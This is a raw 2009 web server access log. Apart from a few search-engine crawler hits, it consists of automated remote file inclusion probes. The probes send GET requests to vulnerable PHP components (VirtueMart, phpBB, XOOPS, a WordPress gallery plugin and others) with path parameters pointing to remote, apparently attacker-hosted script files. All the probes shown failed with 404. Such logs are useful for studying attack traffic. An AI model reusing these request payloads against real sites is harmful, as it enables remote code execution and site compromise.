65.55.106.115 - - [04/Jun/2009:10:35:35 -0500] "GET /logs/access_log.1198022400 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [04/Jun/2009:10:35:58 -0500] "GET /logs/access_log.1130803200 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.132 - - [04/Jun/2009:10:35:58 -0500] "GET /logs/access_log.1223856000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
218.246.20.221 - - [04/Jun/2009:10:36:30 -0500] "GET /logs///include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:10:36:43 -0500] "GET /logs/access_log.1233705600///include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:10:36:57 -0500] "GET /logs/access_log.1235952000///include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:37:16 -0500] "GET /logs/access_log.1240358400//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
216.15.161.2 - - [04/Jun/2009:10:37:20 -0500] "GET /logs/access_log.1240358400//arcade.php?phpbb_root_path=http://www.eduugle.com/CBfibroid/id1.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET /logs/access_log.1235520000//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET //include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:39:10 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
195.187.41.140 - - [04/Jun/2009:10:42:06 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 347 "-""Mozilla/5.0"
195.187.41.140 - - [04/Jun/2009:10:42:06 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
195.187.41.140 - - [04/Jun/2009:10:42:06 -0500] "GET /logs/access_log.1240012800//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
211.203.180.144 - - [04/Jun/2009:10:42:49 -0500] "GET /logs/access_log.1240790400//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.203.180.144 - - [04/Jun/2009:10:42:49 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.203.180.144 - - [04/Jun/2009:10:42:49 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
195.187.41.140 - - [04/Jun/2009:10:43:56 -0500] "GET /logs/access_log.1238544000//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://amboy.do.am/data_aciel/id1.txt??? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:10:44:11 -0500] "GET /logs////include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:10:44:11 -0500] "GET /logs/access_log.1233705600////include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:10:44:24 -0500] "GET /logs/access_log.1235952000////include/footer.php?_path[counter]=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
77.221.130.2 - - [04/Jun/2009:10:45:03 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
77.221.130.2 - - [04/Jun/2009:10:45:07 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://208.98.22.241/id.txt??? HTTP/1.1" 404 337 "-""libwww-perl/5.805"
81.196.124.252 - - [04/Jun/2009:10:46:06 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:47:15 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:48:56 -0500] "GET //admin/include/lib.module.php?mod_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:48:56 -0500] "GET /logs//admin/include/lib.module.php?mod_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
218.150.79.146 - - [04/Jun/2009:10:48:56 -0500] "GET /logs/access_log.1241222400//admin/include/lib.module.php?mod_root=http://worldsingle.de/hpmaker/testing/idfx1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:50:08 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:53:10 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:53:10 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:10:53:10 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:53:20 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:53:20 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:53:20 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:10:53:34 -0500] "GET /logs/access_log.1238803200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:10:54:40 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.184 - - [04/Jun/2009:10:58:06 -0500] "GET /logs/access_log.1167696000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.34.78.110 - - [04/Jun/2009:10:58:35 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
195.34.78.110 - - [04/Jun/2009:10:58:43 -0500] "GET /logs/access_log.1241654400//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
65.55.106.219 - - [04/Jun/2009:10:59:07 -0500] "GET /logs/access_log.1199923200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
85.17.162.28 - - [04/Jun/2009:11:02:01 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:02:01 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:02:01 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 372 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:02:21 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 372 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:02:54 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 345 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:11:02:54 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 350 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:11:02:56 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:11:03:00 -0500] "GET /logs/access_log.1238803200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 372 "-""Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:11:04:31 -0500] "GET /logs/access_log.1235606400//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 372 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:04:31 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 350 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:04:31 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 345 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.17.162.28 - - [04/Jun/2009:11:06:15 -0500] "GET /logs/access_log.1236643200//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://samez.sk/hsconfig/js/config?? HTTP/1.1" 404 372 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
72.36.134.234 - - [04/Jun/2009:11:06:15 -0500] "GET /logs/access_log.1241308800/errors.php?error=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:11:06:15 -0500] "GET /errors.php?error=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
72.36.134.234 - - [04/Jun/2009:11:06:15 -0500] "GET /logs/errors.php?error=http://www.klangrevolution.de/redaxo//include/idade1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
212.203.95.235 - - [04/Jun/2009:11:11:37 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
212.203.95.235 - - [04/Jun/2009:11:11:42 -0500] "GET //include/mail.inc.php?skin_board_path=http://www.westsite.org.ru/404.txt??? HTTP/1.1" 404 304 "-""libwww-perl/5.805"
89.107.224.140 - - [04/Jun/2009:11:14:36 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:11:14:36 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:11:14:36 -0500] "GET /logs/access_log.1239235200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
89.107.224.140 - - [04/Jun/2009:11:14:59 -0500] "GET /logs/access_log.1240185600//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:17:43 -0500] "GET //include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:17:43 -0500] "GET /logs//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:17:43 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
65.55.106.118 - - [04/Jun/2009:11:20:06 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.185.20.88 - - [04/Jun/2009:11:21:19 -0500] "GET /logs/access_log.1237680000//bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:11:21:19 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:11:21:19 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
123.125.64.49 - - [04/Jun/2009:11:25:39 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
199.120.90.222 - - [04/Jun/2009:11:26:43 -0500] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:11:26:43 -0500] "GET /logs/access_log.1240358400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:11:26:47 -0500] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:11:26:53 -0500] "GET /convert/mvcw.php?vwar_root=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 299 "-""Mozilla/5.0"
199.120.90.222 - - [04/Jun/2009:11:26:59 -0500] "GET /logs/access_log.1239926400//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:11:27:05 -0500] "GET /logs/convert/mvcw.php?vwar_root=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 304 "-""Mozilla/5.0"
218.246.20.221 - - [04/Jun/2009:11:27:05 -0500] "GET /logs/access_log.1231891200/convert/mvcw.php?vwar_root=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
213.189.9.11 - - [04/Jun/2009:11:27:10 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:11:27:10 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:11:27:50 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 331 "-""libwww-perl/5.811"
213.189.9.11 - - [04/Jun/2009:11:27:50 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.greek-portal.com/fyrom_info/id??? HTTP/1.1" 404 326 "-""libwww-perl/5.811"
218.246.20.221 - - [04/Jun/2009:11:28:54 -0500] "GET /logs/access_log.1232755200/convert/mvcw.php?vwar_root=http://hit168.com.cn/images/upload/id.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
123.125.64.51 - - [04/Jun/2009:11:30:07 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
94.23.200.54 - - [04/Jun/2009:11:30:23 -0500] "GET /logs/access_log.1233705600//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:30:23 -0500] "GET /logs//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:30:23 -0500] "GET //include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:30:24 -0500] "GET /logs/access_log.1235952000//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
94.23.200.54 - - [04/Jun/2009:11:30:24 -0500] "GET /logs/access_log.1233878400//include/footer.php?_path[counter]=http://dayea.net/bbs//jso/fx29id1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:11:33:31 -0500] "GET //bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:11:33:31 -0500] "GET /logs//bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:11:33:31 -0500] "GET /logs/access_log.1237680000//bbs//skin/zero_vote/ask_password.php?dir=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:11:34:51 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:11:34:51 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.54.32.201 - - [04/Jun/2009:11:34:56 -0500] "GET /logs/access_log.1239580800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.115 - - [04/Jun/2009:11:35:05 -0500] "GET /logs/access_log.1147564800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.103.144 - - [04/Jun/2009:11:35:13 -0500] "GET /logs/access_log.1239580800//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:11:35:13 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:11:35:13 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
88.191.103.144 - - [04/Jun/2009:11:35:17 -0500] "GET /logs/access_log.1239667200//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://asoka.nl/content/images/avatar/fx29id1.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
60.251.217.4 - - [04/Jun/2009:11:35:20 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.proektov.ru/id.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
60.251.217.4 - - [04/Jun/2009:11:35:20 -0500] "GET /logs/access_log.1239408000///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.proektov.ru/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:11:35:24 -0500] "GET /logs/access_log.1241568000/index.php?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
60.251.217.4 - - [04/Jun/2009:11:35:25 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.proektov.ru/id.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
190.144.44.36 - - [04/Jun/2009:11:35:28 -0500] "GET /logs/access_log.1242000000/index.php?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
190.144.44.36 - - [04/Jun/2009:11:35:28 -0500] "GET /logs/index.php?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.79"
190.144.44.36 - - [04/Jun/2009:11:35:28 -0500] "GET /index.php?sourcedir=http://www.freewebtown.com/fucku2/v6.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.79"
60.251.217.4 - - [04/Jun/2009:11:38:54 -0500] "GET /logs/access_log.1240444800///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.proektov.ru/id.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:29 -0500] "GET /logs/access_log.1239408000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:29 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:29 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:31 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:31 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:39:31 -0500] "GET /logs/access_log.1239408000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:41:48 -0500] "GET /logs/access_log.1237507200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:41:51 -0500] "GET /logs/access_log.1237507200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:11:42:17 -0500] "GET /logs/access_log.1239408000//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:11:42:17 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
218.249.36.194 - - [04/Jun/2009:11:42:17 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:11:43:34 -0500] "GET /logs//include/mail.inc.php?skin_board_path=http://www.eduugle.com/CBfibroid/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
